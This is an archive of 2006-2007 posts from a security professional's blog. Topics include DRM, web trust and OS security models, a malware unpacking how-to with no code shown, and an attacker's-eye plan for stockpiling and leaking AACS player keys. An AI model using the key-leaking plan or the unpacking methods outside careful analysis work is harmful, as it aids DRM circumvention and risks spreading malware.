Generally speaking, I'm not big on cheerleading for my employer. I try to be careful about plugging my company's stuff out of context. If I'm writing a book or an article, a mention in my bio is usually sufficient. If I'm speaking, the line on the first page of the slide deck is usually good enough, even though they probably paid for my travel. And when I'm overtly pointing out something we're doing, I try to make it abundantly clear that I'm an employee, and that I'm in sell mode.

But when my employer does something above and beyond, and I really approve of it, I'm willing to occasionally give props like this. I think an ad campaign like this takes balls of a certain minimum diameter, and I'm glad to see we've got 'em.

The cynics (and maybe competitors) among you might look at an ad like this, think to yourself that you haven't heard much about BigFix before, and conclude that this is a desperate cry for attention from a struggling company. And frankly, if I weren't on the inside seeing what we are doing, I might agree with you, and cringe when I saw us doing this.

But the fact is, we are growing big time. We are replacing our competition all the time, and beat them regularly in customer evaluations. Despite the fact that these guys pay me, and I'm talking about the software that I QA every day, I'm still sincerely impressed with it. It actually works.

We do not come in peace.

Old skool security

2007-02-03T23:39:00.000-08:00

While researching things for the Oldest Vulnerability Contest, I ran across a number of references to "Computer abuse perpetrators and vulnerabilities of computer systems" 1975, by Donn B. Parker. I did find it listed on Amazon, unknown binding, ASIN B0006WFZ9I. I left in on pre-order for a good year or so, but no one was ever selling one.

Mr. Parker appears to have written a number of security books and reports in the 70's and 80's, mostly while working at SRI. You can find most of his published books easily enough, but not what I'm looking for. I'm guessing it's not a regular book.

I can see that he left a collection to The Charles Babbage Institute at UMN that includes it. I'm going to check there about getting a copy. He seems to have granted some copyrights to CBI, so that might work out.

Also, anyone know if Donn Parker is still alive, and if so, how to reach him? I'd love to do an interview with him. I see references to him doing things in the early 2000's, so he can't have been gone long, if he is.

Amazon Links

2007-02-03T13:11:00.000-08:00

I'm trying to see what Amazon links look like now. I've had an Amazon affiliate account for years, but I have barely ever used it. I used to just throw my associate ID ("thievco") onto links, but it looks like that changed probably around 2004. Amazon sent me a quarterly report email the other day, so I thought I would look into it. I plan to mention books frequently, and I'm not at all above throwing on my associate ID. But I wanted to see how it was going to look.

Here's one for my latest book, which is now in print and in stock:

Let's see how that looks. I may twiddle this post, apologies if it shows up in a feed multiple times. Of course, this is all javascripty, so if you're reading this in an RSS reader, you probably don't see it at all. Don't worry, I'll do a proper post in the near future where I shill my latest book the right way.

Update: Whoops! I was wrong. I found the right report, and I did get some hits from the old-style affiliate links. I put a link somewhere, and two people bought a book based on that. I have earned 83 cents this year so far. Thank you for the support. ;)

"Art of Software Security Assessment, The"

2007-02-03T13:00:00.000-08:00

Just got a new post in my RSS feed from the authors' blog for "The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities". Justin Schuh says that InformIT has their book on sale at a significant savings. I did some cursory checking, and InformIT does seem to have the best price. Ground shipping was free, so my total (after adding tax) was $35.88. Not bad. Amazon wants list price for it, so don't by it there.

I've been meaning to buy this book since it came out. This offer seemed like a good reason to get around to doing that. Obviously, since I'm just now buying it, I can't offer a review. However, a number of people whose opinions on this topic I respect, like Dave Aitel, and the Matasano guys, indicate that it is well worth reading.

I'll try and get a proper review in, but my reading backlog is already comically long. But mostly I wanted to point out that this looks like a cool book, and if you're going to buy it, do so at this price.

Update: Uh oh, I got an email that it is backordered. "We strive to fill backorders within 30 days. If we are unable to ship your backordered item(s) within that time frame, we will cancel the item(s) on backorder and you will receive an e-mail confirmation of the cancellation." Good thing I'm not in a hurry. I hope I didn't talk anyone into wasting their time waiting if it's not going to come.

Update 2: It arrived on Feb. 19. The guys posted a blog entry about the delays. I suspect they have the stock straightened out now.

Opening cars with a tennis ball

2007-02-02T23:55:00.000-08:00

Watch this video of a woman opening a locked car with a tennis ball. Brought to my attention in a Digg post.

Like a lot of people in my business, I do a little lockpicking, though I'm not particularly good at it. I'm curious if anyone knows exactly what is going on in this particular car door lock. I'm curious if the wafers and sidebar are being pressed into place by the air pressure, or if the air is actuating the lock pull linkage, or what.

MoAB to the BillG

2007-02-02T23:38:00.000-08:00

You know your month of bugs is good when Bill Gates is out there pimping them for you.

Hey Bill, are you daring people to do a MoVB?

Mooninites

2007-02-01T20:12:00.000-08:00

I, for one, am outraged at the ridiculous over-reaction of the Boston authorities to what amounts to a battery-powered litebrite

Wait, I can get the bomb squad to come detonate things by attaching LEDs to them?

I can tie up the entire police force of a major metropolitan city for an entire day with a $100 worth or parts from Radio Shack? Completely distracting them from anything else that might be planned for that day?

Wait wait... I can get national news coverage on every major news outlet, and get away with it by just not admitting it was me in the first place?

Carry on.

Web of trust

2007-01-19T21:45:00.000-08:00

I continue to add little bits of other people's Javascript on the side of my blog. I just added some code from Technorati. Earlier, I added a hit tracker from Sitemeter and am publishing my RSS feed via Feedburner. The Technorati and Sitemeter things are raw Javascript includes. Oh, and I've started using Zooomr pictures, more Javascript. I haven't added the dozen "pick me!" buttons from Digg et al, yet. But I'm not ruling it out in the future. I don't plan to turn on the ads, but that's just more of the same.

The point is, if you want to 0wn my readers, just compromise Blogger, Technorati, Sitemeter, Zoomr or Feedburner. Or maybe something they depend on. Then you can hand out all of the browser exploits in my name you want.

It's not like attacking one site to compromise another has never been done, or that I haven't been targeted before. I'm just saying.

Web 2.0 is looking a lot like a huge interconnected chain of transitive trust. See also: myspace.

AACS crack update

2007-01-11T13:57:00.000-08:00

So I made some bad assumptions in my earlier post about the AACS crack. That's what I get for assuming and not hunkering down to read the spec. I know more about it now because of today's Freedom to Tinker post from J. Alex Halderman. He explains:

Blacklisting would be a PR and business disaster if it meant a lot of consumers had to throw away their fancy players as a result of a crack. That’s why AACS allows each individual player to be assigned its own unique set of device keys that can be uniquely blacklisted without adversely affecting other players.

So, the AACS people are smarter than I gave them credit for. If manufacturers follow recommendations and issue individual keys to each device, then only one person's device is disabled, and there's a good chance that person was involved in leaking the key, so maybe that's appropriate. Further, Halderman says that they only disable new discs with the revocation, and they don't brick the device. Hm, I guess they are nicer than I might be in their situation. ;)

Halderman refers to the process as "some serious crypto wizardry." Now, I still haven't read the spec, and he has. But I don't see why this should be significantly more complicated than the whole CA/PKI arrangement. The AACS guys probably are a master CA, the licensees are sub-CAs, and they issue a private key/cert pair to each device. When there's a leak, the AACS people can surgically revoke the leaked set.

Does this change the end game? I don't think so. Halderman talks about some possible things like a title key-issuing oracle. Sounds like too much trouble to me. Here's how I think I might do it:

Put in the hard work to find some software or hardware device that I know how to recover the keys from; leak those keys, and only the one set
At my leisure, stock up as many other keys as I think I'm going to need
Wait for the script kiddies to complain that Star Trek XV won't work with my keys
Leak the next set

I could stock up dozens or hundreds of keys, and they are probably good for months at a time. They are good until someone releases a HD DVD that anyone cares about.

Other potential problems that I foresee popping up:

Maybe I flood the Internet with tons of keys. The revocation list gets large and unwieldy. Maybe discs start to fill up, maybe players take forever to parse through them.
I don't expect the software players to cut a key for every single user, especially if it's like current DVD player software that gets thrown in the box of every Dell computer. They don't want to cut custom CDs, and I assume these keys are all too long to type in from a printed label. On the contrary, the Internet would work fine for some soft of "activation" scheme which gets you a key set right then and there. The problem with that is that you now have a website that essentially cuts keys for you at will, and they have their CA private key stored somewhere where it could get stolen.
I don't expect every Taiwanese hardware manufacturer to do what they are supposed to, and they will reuse player keys
Someone could leak or steal a CA keyset
There might be a crypto break like with CSS
And last but not least, how about I keep my keys to myself, and just release the decrypted movies?

(And as a disclaimer, I remind people that why I say "I" here, I'm writing from the point of view of a resourceful attacker. As a further disclaimer and future excuse, I still haven't read the AACS spec yet. I guess I need to get on that now.)

Testing Zooomr

2007-01-10T23:42:00.000-08:00

Please stand by, I'm trying to see how Zooomr works with Blogger.

Here's a picture of part of one of my bookshelves:

OK, looks like Blogger really wants you to limit things to sizes that work with their layout. I guess I'll be sticking to small sizes that you can blow up by clicking on.

Now, to see why Zooomr doesn't store the original size... Ah, OK once you have a Pro account, it looks like you get to keep the original size, too.

Also, it would be ungenerous of me to not point out that Zooomr is giving away free Pro accounts for something as simple as posting a pic like this on your blog.

Unpacking I

2007-01-10T21:26:00.000-08:00

Recently, I was given a copy of a piece of malware by Curt Wilson. He had unpacked it in memory, but wasn't quite sure how to finish the process in order to load it up again for further analysis. As a simple howto, and as a way to keep a few notes for myself, I'm documenting the unpacking process.

The sample in question was found as upnp.exe on disk. Looking at it, it was packed with Morphine. I don't personally consider knowing which packer it is ahead of time to be critical, though there are a couple of exceptions. First, if I know it is UPX packed, then I may just try using the latest UPX to unpack it. It works maybe half the time. The other half, there are UPX "corrupters" out that there will break that, and there is at least one packer designed to look somewhat like UPX. Second, there are a couple of packer out there that are probably easily beyond my skill level, and I wouldn't bother trying. The two I can think off of the top of my head are both written by Nicolas Brulez.

If you want to find out what packer was used, you can usually get an answer from PEiD, or by trying the VirusTotal service. Here is the VirusTotal analysis of upnp.exe, for example. Both of those correctly identify this as Morphine, though I got through the hard part of the unpacking without knowing that.

The basic unpacking technique is to execute the program with a debugger until the original binary (or as much as is left) is uncompressed in memory, and then you dump the copy in memory. Usually, when you dump it you also fix the imports so that your analysis tool will know which functions are being called. I'll show you an example in a moment. For a somewhat more advanced example, you can watch a video where Nicolas does an unpack on a binary that has more than one packer used on it, each with multiple antidebugging tricks. This was from a talk we gave at RECON.

First thing, the warnings: If you choose to try to unpack malware, you are taking a chance that you will make a mistake, and just run the thing. If you do this on a real production machine, you will be sad, and infected. If you're smart, you will have a sacrificial machine you can do this on, that you can restore to a known state with no place for the malware to hide. VMWare is popular, though unfortunately, a lot of malware now checks to see if it is running in a VM and shuts down.

The strictest AV guys will also tell you that it is irresponsible to do any analysis on a non-isolated machine, because there's a good chance you will spread it further. If you work on a non-isolated machine and people find out, there's a chance that some or all AV companies will never employ you. That may not seem like much of a threat, but you never know who Symantec or McAfee are going to buy next.

In other words, do as I say, not as I do. When you press the wrong button in your debugger, and run the malware all the way, you will find yourself very interested in finishing the analysis in a hurry in order to find out what you've just done to your machine. You should also know which cable to pull in a hurry to disconnect yourself from the Internet.

So, on with the debugging. Load the program in your favorite debugger. I like to use the debugger now built into IDA Pro. Another popular (and free) debugger is Ollydbg. With both, you need to set an initial breakpoint, and then run the program. Generally speaking, what you will be doing is stepping through the code until you get to the point where you think you've hit the original packed binary, then you leave it paused.

This is the easiest place to screw up. For one, in both debuggers, the step, step over, and run keys are all next to each-other. If you fat-finger the keypress, you just infected your machine. Also, you may encounter antidebugging tricks. I can't say I noticed any with Morphine, but I have certainly seen them with others. Even if you're single-stepping, if you miss accounting for an antidebugger trick, you may find that the program finishes executing without you.

One of the things that pretty much all packers do is to replace a certain portion of the OS's loader. For Windows, this almost always means replacing the portion that takes care of loading and mapping the imports. So, if you are tracking through packer code, you will see the packer calling LoadLibrary and GetProcAddress, in a loop. Packers also almost always compress and/or obfuscate the binary code, so there's also going to be some loops where it is iterating over memory segments. These memory segments are usually create by calling VirtualAlloc.

I bring this up, because you really, really want to step over these functions and not waste time stepping through them or trying to follow them into the kernel. You will also need to become adept at spotting loops. You will need to skip those most of the time, just because they will be too tedious to step through manually. Yet another place to screw up.

Here's an example of something I can spot from experience:

You see where it's pushing a bunch of bytes in the ASCII range onto the stack, and then calling something? Let me decode it to make it a little easier to read:

Read the function names backwards. This tells me I'm in the beginning stages of restoring the imports. Then it calls VirtualAlloc:

And you trace through some loops where it is importing all the libraries and fixing up pointers to the functions.

Eventually, you will arrive at something like this:

There is often a telltale "JMP EAX" or "CALL EAX", or similar. Step one more instruction, and you're at the Original Entry Point (OEP). This is when you're unpacked, or as much as you're going to be. If you trace much farther, you start initializing things, and you might start causing trouble for your analysis. This is what it looks like when we're at the OEP:

I usually like to take note of the OEP and the last address before the OEP. I like to set a hardware breakpoint on execute at one or both of those. In this case, the OEP isn't mapped to a memory segment until after the program has run some portion of the way through the packer, so I set it on the last address before the OEP, and save the database. That way, if I have trouble with the dump step, I can replay right up to that point without having to manual step it again. That works in this case (Morphine) but not in all cases. Sometimes you have to account for antidebugger tricks along the way.

Now that you're at the OEP, you need to dump the binary in memory. I've used two tools for this, Import Reconstructor (imprec) and LordPE. Before I get into the technical details on each, I should talk about the reason I ended up putting this post together.

I was having some trouble getting a good dump of upnp.exe. Specifically, I had traced it to the OEP as I have described, but I couldn't get imprec to dump it properly. The imports table wouldn't come out right. That's when I went to Jason Geffner for help. Jason is another of these guys who is better at reverse engineering than I am. I met him originally in the class I took from Nicolas Brulez. Jason was taking it too, but he didn't really need it.

Jason wanted told me to just use LordPE. He said that Morphine ended up rebuilding the original PE file in memory, and that LordPE did a perfect dump. He even made a screenshot of what settings I should use:

Sure enough, I used LordPE and it dumped perfectly. I'd had good luck with imprec before. Nicolas had shown me the tool in his class. Before that I had been doing raw memory dumps and manually naming offsets. No fun. So I've had a tendency to reach for imprec because I'm used to it.

But, there was no arguing with the fact that LordPE worked for me in this case, and imprec didn't. So part of what I planned to do with this post was to recommend LordPE. So I repeated the steps on my home machine so I could take screenshots and so on. When I got to the step where I was going to show the bad dump made by imprec... I found that it had dumped it perfectly.

Thinking back, I believe why imprec didn't work before was because I had done it on a work machine, which was Windows XP x64. When I tried to use imprec on the 64-bit Windows, I had a problem with some of the imports not being valid. That probably had to do with why it wasn't writing out the import table properly. I had removed the "bad" imports, but it probably just broke the process. I think I was able to use LordPE on the same machine, but now I'm going to have to go back and check.

Which brings me to a general point about tools. If you've got tools you use that did into the guts of a system, then those tools are probably going to quit working when you move to a newer system. This is especially true of tools for which development has ceased (which seems to be the case with imprec.) If it's not being actively maintained, then it will eventually "expire" when the OS moves on. On my home machine, which is regular XP, imprec still works fine. Further, malware and packers tend to account for popular tools by implementing countermeasures. So, if you plan to keep up on reverse engineering, you should also plan to keep looking for the latest and greatest tools.

But in any case, my thanks to Jason for encouraging me to check out LordPE and for fixing my mistake. Back to the techie bits.

I'll skip the imprec demo for now. If you're interested in me spelling out the same steps for imprec, leave me a comment, and I'll write it up. In LordPE, you basically run the tool, find the process you still have paused at the OEP in your debugger, right-click it and select dump full:

In this particular case at least, you now have a good copy of the unpacked executable, and you can load it up in your favorite analysis tool:

If you're curious, the binary is a fairly typical call-home-to-an-IRC-C&C bot.

Notes:

Sorry about the pictures, the arrangement isn't ideal. If you click on one, you can drill down a couple of levels and see the full size so you can read it. I'll probably try tweaking the pictures to work a bit better. Any Blogger and/or Zooomr advice is welcome.
I realize I've got a weird mix of beginner and advanced topics here. Sorry about that. Again, this is at least partially to remind myself as well. If you liked the post and want me to take the tech level up or down, let me know. It probably won't be hard to talk me into writing about it more.
Both Nicolas and Jason teach this topic as a training attached to security conferences. Nicolas teaches it at RECON. I don't know for sure yet if Nicolas will be teaching this year. Jason has taught at Black Hat, but it doesn't look like the Black Hat training schedule for this year has been announced yet either. I'll post an update if I find out anything about either of them teaching again.

Voicemail from bureau of prisons

2007-01-09T11:34:00.000-08:00

I walked into the office this morning, and glanced at my phone. It said I had 7 new callers since I left yesterday. Now, I'm not much of a phone person. I hate them. I think that comes from a brief stint I did on the help desk phones at Bechtel.

So, most people know not to call me. I scrolled through the caller-ID list, and there were 6 calls from the same number within about a hour. The number didn't look familiar. Curious, I checked my voicemail, which is something else I rarely do. A man identified himself as being from the IT department of the bureau of prisons, said he had a question for me about a request from an inmate for a book that I wrote the foreword for, and would I please call him.

Uh, sure.

Turns out that someone had put in a request for How to Own a Continent. His opening question was "This isn't fiction, is it?". I explained that it IS fiction, in that none of the events happened, but that we try to keep the technical details real. So yes, it's half fiction, and half technical book. By the time I had called him, he had already taken note of the price and where it is supposed to be shelved, and decided on his own that it didn't qualify as a novel. He made it sound like he had a copy in front of him, which I guess he wasn't planning to forward to the inmate.

I feel a little bad for the inmate who probably won't get to see it now, but I wasn't going to lie about it. I didn't try to grill the prison IT guy, or argue with him about his policies. I figure that was probably pretty futile. Maybe I'll call him back at some point and see if there's anything he is allowed to tell me about which prison this is or the name of the inmate. I assume he can't, but you never know.

If the inmate in question ever sees this: When you get out, or if you transfer somewhere where they are a little more lenient about your reading material, I'll get you a copy.

Eight year old ActiveX control with vulnerability

2007-01-08T22:20:00.000-08:00

Tan Chew Keong recently found an ActiveX control on his Acer laptop that allows for arbitrary file execution. I had read this a month or so go, but was reminded again by today's Slashdot story. I haven't looked into the technical details, but they seem pretty plain.

If this is in fact from 1998, then I am amazed by how long this thing has gone unnoticed.
I'd love to know how many copies of this thing are out in the world. I would hope not a lot for escaping notice for so many years.

I can't decide if this is evidence against many eyes, or evidence for the idea that less popular software doesn't get any attention.

AACS Cracked?

2007-01-08T18:28:00.000-08:00

It seems that AACS has been reported to be "cracked". Someone by the name of muslix64 claims to have created a program that:

is a tool to decrypt a AACS protected movie that you own, so you can play it back later using an HDDVD player software.

He also says right up front that it's not complete as-is:

This software don't provide any cryptographic keys, so you have to add your own keys.

There used to be a video on YouTube that showed it being used, I imagine. I haven't seen the video. The link to the YouTube now shows:

This video has been removed at the request of copyright owner Warner Bros. Entertainment Inc. because its content was used without permission

If it's not clear, I haven't looked at this too hard. While it's interesting on some levels, I'm not interested in digging into the tech details just yet.

What I find interesting is some of the reactions.

Freedom to Tinker:

Typical users can’t extract title keys on their own, so BackupHDDVD won’t be useful to them as it currently stands — hence the claims that BackupHDDVD is a non-event.

Slashdot (comments):

the very clever fellow just implemented that publicly available decryption routine, and also discovered an (as of yet unreleased) method for obtaining decryption keys.

and

Yes, and the Engadget article that is TFA is mistaken... He didn't supply any keys, just disc IDs (to map to human readable names of the discs). The place where the keys would have been were all stubbed out with all nulls.

If this is a crack for the DRM, then GPG is a crack for PGP.

For the record, there was some confusion about whether the program shipped with any decryption keys or not. The Freedom to Tinker guys say no, I'll take their word for it.

Now, the Freedom to Tinker guys certainly know the score, and I hope I'm not making it look otherwise by quoting them out of context. But the general feeling from some portion of the people reading about this is that it isn't a proper crack; it doesn't come with keys. They can't use it.

They're missing the point, and what the guy is up to.

The people who complain that they can't use it without keys are also likely going to need a GUI app that rips HD DVDs to MPEG files with a single big green button. As near as I can tell without trying it myself, this program looks something like a GUI with a button. Just add keys.

So, where do you get keys? You get them from existing players, either hardware, firmware, or software. Who knows how to do that? Well, I could probably figure it out, if I had enough time. Please note that I'm not offering to find keys for you, I'm just saying that there are lots of us who do reverse engineering, who could probably figure it out.

So, the programmer attempts to keep the most controversial piece of his code modular and updatable. Other people can supply the keys. Maybe he even hopes that he can escape some trouble by not having it be fully functional out of the box. I wish him luck with that, though it's not without precedent. There are a number of MP3 rippers that don't directly include the patented MP3 codec, and they require you to go find a copy of the LAME libraries which do. The CD ripper programs say they don't include the codec, and the LAME project says you may need a license for your ripper. I tend to think that the MP3 patent holders have just decided to be nice about it.

A few points to make:

Is it in any way surprising that AACS is cracked/decodable/implemented in a program that doesn't play the MPAA's way? Not, not at all. It's inevitable. That's the basic problem with DRM. They give you a file that you're not supposed to be able to decode or decrypt. And then they hand you a decoder. Sure, they are hoping you won't look inside. But people are curious, and they like to be able to store their files on their own terms.

Is this a "crack" in the proper sense of the word? Well, when I was a kid, "cracking" meant removing copy protection from floppy disks. So in that sense, yes, this is a proper crack. It's working around the little trick that is supposed to keep you from doing things the easy way. Now, if you're talking about something like cracking the security of a program (finding a vulnerability) or "cracking" a crypto algorithm (better term is "break"), then no, this is not that kind of crack.

But that's not how you break DRM. You break DRM exactly like this guy did, by replicating the algorithm and/or keys. Sure, if there is ALSO a software vulnerability or bad crypto, that's interesting too. That happened with CSS, for example (crypto weakness.) but you don't need that to get around DRM. You just need to replicate the function of the player.

Frankly, when I simultaneous learned about this AACS crack and that there are a couple of existing Windows HD DVD players, it was obvious what happened. If you want to keep a secret, do not stick it in a Windows program. Reverse engineers LOVE to take apart Windows programs. If you're going to try and simultaneously keep a secret, and distribute it to every household in the world, then at least stick it in a secret ROM chip so that the likes of a Bunnie Huang are needed to get it out.

So why is this different than PGP? because you don't encrypt something with PGP, and then give a copy of the decryption key to everyone in the world, and ask them not to look. It wouldn't matter if every HD DVD came encrypted to your personal key either, since you have no incentive at all to keep the movie encrypted. What do you care if you give out the plaintext version of a movie?

So, what happens now? Well, the AACS designers aren't all that stupid, they were aware this would happen. So there is a key revocation feature out there. This is where my ignorance kicks in. I don't know exactly how this feature works, but I'm going to make some educated guesses.

There must be some set of keys in a Windows HD DVD player or physical device. I'm sure the AACS people issue a set to every vendor or manufacturer. The goal of the evil hax0r here is to swipe those keys, and probably give them to their buddies or post them on the Internet. So the AACS people figure out which keys have been leaked, and they revoke them. I'm guessing that on the next Disney DVD is a revocation list which the players will obey.

Now, does that mean if the evil hax0rs stole the keys from a Panasonic HD DVD player, that the AACS people have to disable that player? Is it all Panasonic devices, or just that model, or just North American versions of that model, or what? The exact details probably aren't important. I think what it means is that yes, some legitimate Panasonic owner buys a legitimate DVD, and next thing they know, their player is bricked.

Can they seriously be planning to do that? I can't see any plan where they can simultaneous cause the bad guys any significant trouble, and avoid screwing innocent customers.

And that's why DRM sucks.

Vulnerability Pimps

2007-01-03T21:52:00.000-08:00

Marcus Ranum has written a very interesting article about code review, secure coding, Fortify, and vulnerability pimps. The meat of his article is about code review, and there are some real lessons to be learned there. You should take his comments to heart, and implement the review processes he recommends. I know I'm going to look into Fortify now.

There are also some interesting minor insights into Marcus' history. Love him or hate him, you should always pay attention to what Marcus has to say. He graciously added an RSS feed to his site at my request, so please use it.

That said, what I can't let go is "vulnerability pimps". I know, story of his life. He tries to tell people things, and they can only pay attention to his politics. Sorry about that, Marcus.

So, yeah, vulnerability pimps. That's awesome. I'm sure he means for it to be pejorative, but for the folks he is describing, I can't see them taking too much offense. I can see the rise of the purple hat hackers even now.

It's the first time I've heard the term, though maybe he didn't coin it. Google says that Rodney Thayer (at least) used it in 2005. I see Marcus using it in February. Of course, Google doesn't know everything, so I'm happy to take corrections. I can't help but think of this as a Ranumism, though.

As for my politics, I could be accused of encouraging, facilitation, and participating in vulnerability research. Though, not with as much skill as most other vulnerability pimps.

I'll keep my counterpoint brief. Marcus throws out the "many eyes" catchphrase, specifically calling it a failure in the face of his findings. If one does not like independent vulnerability research taking place, then where do you think the checks that Fortify performs come from? If the developers and companies aren't going to look, who else will? If you expect the few eyes to be able to see, where are those eyes going to train?

To be fair to Marcus, he just did the same thing himself. In fact, if I wanted to be extremely ungenerous, I could put him in the same category as the kid who just got a new fuzzer and went looking for problems. But he doesn't deserve that.

The difference for him, as he points out, is that he thinks there's no benefit to touting his findings, (presumably) not even after the patch is out. He reports that everyone was cool, and they are going to get the fix out Real Soon Now. So he can get the problem fixed without the fanfare.

I invite Marcus to finish the experiment, and give us a update later about the following:

Let us know if you will be taking credit for the finds.
Explain how pimping Fortify by searching for vulns in other people's software is different than eEye doing it to pimp Blink.
Tell us how long it takes the programmers to release the patch
Tell us whether the programmers properly acknowledge that this update fixes a security problem, and that people should update right away
Tell us if you spend the extra time to check that the patch correctly fixes the problem you identified

Security models

2006-12-30T23:02:00.000-08:00

This has been bouncing around in my head for years. I still can't quite get it to form properly, maybe someone else can help.

I've worked on a bunch of operating systems over the years. I've forgotten all of the 8-bit ROM-based "operating systems", RSTS/E, CP/M, VMS, and most of Netware. And of course I've forgotten the other ones I've forgotten. That leaves, more or less, DOS, Windows, and unix. And by "Windows" and "unix", I mean a bunch of different flavors. Though anymore if you sit me down in front of even Win9X, I'm a bit rusty there.

I wouldn't really have any basis for understanding the security model of an OS more than 10 or 15 years ago, not beyond the overt features. "Overt" being stuff like username, passwords, and file permissions and ACLs. Mostly because I just didn't know that stuff back then, but also because the major of stuff I touched by volume had no real protected memory model. There would have been a little bit in NT 3.1, and it was there in the unix and VMS, but again, I had no real basis for grokking it.

Point being, I learned my file permission stuff on Netware and VMS, and the more complicated things like process permissions and kernel and user separation on NT4 and later, and unix. Picking up NT-based Windows and unix were fortuitous, since that's where the market went. But that was a self-fulfilling thing, since I worked on what was popular. I actually managed to leave Netware behind about when I would have needed to learn about NDS, and I stopped doing any heavy-duty Windows admin about when AD became the dominant domain model for Windows. Some I'm missing some directory services brain damage, too.

I took all of the NT4 classes, but only bothered to take a couple of the tests. I took some user-level unix classes, but mostly picked it up on my own. I would say that the majority of my useful experience is on-the-job self-taught stuff.

So why do I feel like I have the entire unix security model in my head, but I only have a tenuous grasp on some significant chunks of the Windows security model?

I've done DOS and Windows far longer, though to be fair anything before about NT4 isn't really pertinent. I've done more Windows, too, in terms of hours spent.

Obviously, part of the answer is that the unix model is just simpler. Everything's a file, you get owner, group, and world. There are a few special sticky bits. Everything runs as a user and gets its permissions the same way the filesystem works. Even the pipes are relatively simple. Kernel and user separation are clean. I understand what happens with environment and handle inheritance for child processes. I find the user database very easy to deal with. The typical init startup process is nice and simple. Signals are easy.

Even when you add on things like NIS, full ACLs and SELinux, I think I'm following along just fine.

Windows on the other hand...

File permissions I'm good with. Same with the Registry, it's basically just another filesystem. Process permissions? I gather that they each have a privilege token, and sometimes privileges to change privileges and so on... I know there are a couple of different types of pipes, not sure what's going on with the security model there. Services can be running as different users or local system. There's the event system, I vaguely recall hearing about there being ACLs on that. And I get this sense that there's a ton of other things that I don't even know about.

What happens when Windows boots? When I log in, what process(es) are creating my processes, and what, I get a set of tokens as well? When I change a password, what is happening with permissions that ultimately write my new hash out?

I just starts falling apart for me.

Now, I don't think I'm incapable of learning it. But part of the point is that I never made any concerted effort to learn either security model. Yet, unix feels like it's right there with minimal effort, and Windows is making me work for it. If I ever catch up with Windows, it will be because I made the effort to track down and study some serious documentation. And I'm not opposed to that, I just haven't done it. Pointers to favorite docs welcome.

Part of what I've concluded about this is that the unix model is superior. And that's "superior" in the practical sense that if you can understand it, it's going to work better for you. I'll happily admit that the Windows model might be more expressive, maybe allowing you finer-grain control. But that does me no good.

typesI think another reason that the unix model works much better is because unix itself is far, FAR more modular. I can strip a unix box down to the floorboards, leaving it with no functionality other than the purpose for which it exists. I've done this before with firewalls, various servers, and so on.

Many unix functions do not have a lot of interdependency. I can kill off portmapper, and not have it disable the majority of my administrative tools. Configuration storage is justs as likely to be a text file, which I can change by hand, and not need a front end tool for. I can turn off the damn GUI.

And this is where I start to not be able to articulate it much better. Anyone else have a more elegant way to explain what I'm trying to get at? Does anyone else's experiences even match mine? I have to assume they do, since there's a big correlation between security people and unix fans.

OS X is a slightly different beast. It has (for me) a lot of the obscurity of Windows layered on top of unix. I got nothing when it comes to the mach kernel or the Window manager. But even so, with the unix underpinnings, I am in a much better position to pick up the rest. I can already see where they have made horrible permissions mistakes.

In any case, I'd like to have this be a proper essay someday, and I could use the help explaining it better. I'd love some feedback, even if it's just "me too" or "you're high."

Negative vulnerabilities?

2006-12-10T21:06:00.000-08:00

As part of the recent discussion having to do with agents introducing new vulnerabilities to a system, I've been thinking. Everyone agrees that adding software means adding vulnerabilities. Even if you're one of the best at writing bug-free software like Knuth or DJB, you still make the occasional mistake. (Even if DJB hates to admit it.)

Richard Bejtlich mentions it again while commenting on the agent discussion.

Worse, as is the case any time you add code to a platform, you are adding vulnerabilities.

Of course, I understand fully what people are saying when they say this, and I'm not trying to disagree. But that got me thinking.

Now, you can't have a negative number of vulnerabilities in your own code. At best, the theoretical minimum is 0. But could you, by adding code, remove someone else's vulnerabilities? I think it might be possible.

First off, there's the obvious case of a patch. You added something, and are now (hopefully) down one vulnerability, right? Well, not exactly. Modern patches work by replacing an entire chunk of code with one just like it, (hopefully) minus the vulnerability. It will, for example, replace an entire DLL. So that's not more code, that's different code. And sure, it might introduce more vulnerabilities too, but I'm trying to make a point here, work with me.

So fair or not, I just removed the vendor from being able to go negative on vulnerabilities. At least, not within the same software package. Nothing that says Microsoft couldn't add something outside of Word to remove Word vulnerabilities, though.

How about third-party patches? Well, depending on how they work, they might qualify for what I'm thinking. If there is something that sticks around all the time, and is somehow removing a vulnerability from another piece of software on that system (and adds none of its own, of course), then maybe it just achieved negative vulnerability.

Now, it's unlikely that a program of any size is not going to have its own vulnerabilities, so it had better fix a large number of someone else's. This is what I think the HIPS category is trying to do. If you look at Blink or Determina, they dig around in the guts of someone else's software, and do things that try to remove vulnerabilities. Or specifically, make them nonexploitable, downgrading them from vulnerabilities to just bugs. For purposes of this discussion, lets call the process exiting instead of running shellcode "no longer vulnerable."

Briefly, a sidebar: I'm quite annoyed by the current use of the term "HIPS". If you happen to be a Windows Secrets paid subscriber, you may have seen my article about that. Briefly, there is a bunch of stuff calling itself HIPS, including traditional stuff like AV and file integrity checkers (read: Tripwire.) Don't do that. Otherwise, you don't leave me a good name for things like Blink, Determina, W^X, DEP, and those categories of protection. Naming suggestions welcome.

So lets assume these things work, at least partially. If so, and they remove a substantial number of vulnerabilities (more than they add), then you have added software and removed vulnerabilities. Discuss.

(For those wondering if I have an ulterior motive on this one; not really. BigFix doesn't do this kind of thing. We might someday parter with a vendor that does, or add management of such products to our agent, but we don't muck about it the binaries of other software. I'm just interested in exploring the idea of adding software to remove vulnerabilities.)

Nothing wrong with agents

2006-12-08T16:14:00.000-08:00

This post is mostly in reaction to a post from Thomas Ptacek on the Matasano
Blog, one of my favorites. Tom in turn says his was in reaction to post from Alan Shimel, who is replying to an article by Ray Wizbowski. That gives you some idea where in the food chain I am. But it doesn't get interesting for me until Tom's post, so that's where I start.

I'm not trying to feed any kind of Matasano/BigFix war but hey, they started it. (For the seriously humor impaired, I'm kidding. I've known most of the Matasano guys casually for years, and Amrit has worked with Tom, and so on. We're just disagreeing with each other using technical points, that's how it is supposed to work.)

If you're just running across this post via some other blog, I'm the QA Manager at BigFix. We are a vendor of agent-based systems management software. Though, I'm sure our lawyers would like me to point out that I'm providing my own opinions here, and I'm not a company spokesperson. Anyway, probably because of where I work and what I know, I'm a fan of the agent-based approach, and naturally I think we do a fine job, our stuff is secure, and we can do it all. So if you're thinking "Ryan is biased", well duh.

Onto the bloggery. I make a few comments of little substance on Tom's blog entry, and he emails me to politely suggest that if I want to disagree, I should quit making snide jabs, and get to the point-by-point.

Here's the premise I start from:

You have a large number of machines (an "enterprise")
You wish to have mass control over them (you want "management")
